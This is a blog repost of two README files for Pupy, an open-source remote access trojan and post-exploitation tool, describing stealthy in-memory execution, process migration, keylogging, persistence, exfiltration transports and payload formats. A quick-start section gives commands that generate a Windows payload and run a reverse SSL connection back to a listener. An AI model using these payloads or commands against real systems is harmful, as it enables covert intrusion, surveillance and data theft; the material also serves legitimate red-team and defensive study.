Pages

Saturday, 17 April 2021

Pupy

 Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python.

Build Status

Installation

Installation instructions are on the wiki, in addition to all other documentation. For maximum compatibility, it is recommended to use Docker Compose.

Refer to the wiki

Description

Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.

Features

  • Windows payload can load the entire Python interpreter from memory using a reflective DLL.

    • Pupy does not touch the disk.
  • Can be packed into a single .py file and run without any dependencies other than the python standard library on all OSes.

    • PyCrypto gets replaced by pure Python AES & RSA implementations when unavailable.
  • Reflectively migrate into other processes.

  • Remotely import pure python packages (.py, .pyc) and compiled python C extensions (.pyd, .so) from memory.

    • Imported python modules do not touch the disk.
  • Easily extensible, modules are simple to write and are sorted by os and category.

  • Modules can directly access python objects on the remote client using rpyc.

  • Access remote objects interactively from the pupy shell and get auto-completion of remote attributes.

  • Communication transports are modular and stackable. Exfiltrate data using HTTP over HTTP over AES over XOR, or any combination of the available transports.

  • Communicate using obfsproxy pluggable transports.

  • Execute noninteractive commands on multiple hosts at once.

  • Commands and scripts running on remote hosts are interruptible.

  • Auto-completion for commands and arguments.

  • Custom config can be defined: command aliases, modules. automatically run at connection, etc.

  • Open interactive python shells with auto-completion on the all-in-memory remote python interpreter.

  • Interactive shells (cmd.exe, /bin/bash, etc) can be opened remotely.

    • Remote shells on Unix & Windows clients have a real tty with all keyboard signals working just like an SSH shell.
  • Execute PE executable remotely and from memory.

  • Generate payloads in various formats:

FormatArchitectureShort Name
Android Packagex86 & ARMv7apk
Linux Binaryx86lin_x86
Linux Binaryx64lin_x64
Linux Shared Objectx86so_x86
Linux Shared Objectx64so_x64
Windows PE Executablex86exe_x86
Windows PE Executablex64exe_x64
Windows DLLx86dll_x86
Windows DLLx64dll_x64
Python Scriptx86 & x64py
PyInstallerx86 & x64pyinst
Python Onelinerx86 & x64py_oneliner
Powershellx86 & x64ps1
Powershell Onelinerx86 & x64ps1_oneliner
Ducky ScriptN/Arubber_ducky
  • Deploy in memory from a single command line using python or powershell one-liners.

  • Embed "scriptlets" in generated payloads to perform some tasks "offline" without needing network connectivity (ex: start keylogger, add persistence, execute custom python script, check_vm, etc.)

  • Multiple Target Platforms:

PlatformSupport Status
Windows XPSupported
Windows 7Supported
Windows 8Supported
Windows 10Supported
LinuxSupported
Mac OSXLimited Support
AndroidLimited Support

Documentation

All documentation can be found on the wiki.

Refer to the wiki

FAQ

Does the server work on windows?

Pupy has not been tested on Windows. Theoretically, it should work on any platform that supports Docker and Docker Compose. However, you will need to adapt the Docker Compose installation instructions for the Windows platform.

I can't install Pupy. The installation fails.

  1. Please refer to the wiki. It is possible that your answer is there.
  2. Search the Github issues and see if your issue was already solved.
  3. If you issue was not solved, open a new issue following the issue guidelines.

If you do not follow these steps, you issue will be closed.

Android and/or Mac OSX payloads and modules don't work.

Pupy has limited support for Android and OSX. These platforms may not be well maintained and may break intermittently. Some modules (i.e. keylogger) may be missing for these platforms.

Development

If some of you want to participate to pupy development, don't hesitate! All help is greatly appreciated and all pull requests will be reviewed.

Also there is small note about development. Please run flake8 before doing any commits. File with config is here.

Contact

PlatformContact Info
Emailcontact@n1nj4.eu
Twitterhttps://twitter.com/n1nj4sec

This project is a personal development, please respect its philosophy and don't use it for evil purposes!

from https://github.com/n1nj4sec/pupy

-----

Pupy is a remote administration tool with an embeded Python interpreter, allowing its modules to load python packages from memory and transparently access remote python objects. The payload is a reflective DLL and leaves no trace on disk. (这个fork版略有不同)

Pupy

Pupy is an opensource RAT (Remote Administration Tool) written in Python. Pupy uses reflective dll injection and leaves no traces on disk.

Features :

  • On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).
  • modules are quite simple to write and pupy is easily extensible.
  • Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client
    • we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
  • communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
  • all the non interactive modules can be dispatched on multiple hosts in one command
  • Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
  • modules can be executed as background jobs
  • commands and scripts running on remote hosts are interruptible
  • auto-completion and nice colored output :-)
  • commands aliases can be defined in the config

Implemented Modules :

  • migrate (windows only)
    • inter process architecture injection also works (x86->x64 and x64->x86)
  • keylogger (windows only)
  • persistence (windows only)
  • screenshot (windows only)
  • command execution
  • download
  • upload
  • socks5 proxy
  • interactive shell (cmd.exe, /bin/sh, ...)
  • interactive python shell
  • shellcode exec (thanks to @byt3bl33d3r)

##Quick start In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

generate/run a payload

for Windows

./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.

for Linux

pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

for MAC OS X

easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

start the server

  1. eventually edit pupy.conf to change the bind address / port
  2. start the pupy server :
./pupysh.py
from https://github.com/nvssks/pupy

No comments:

Post a Comment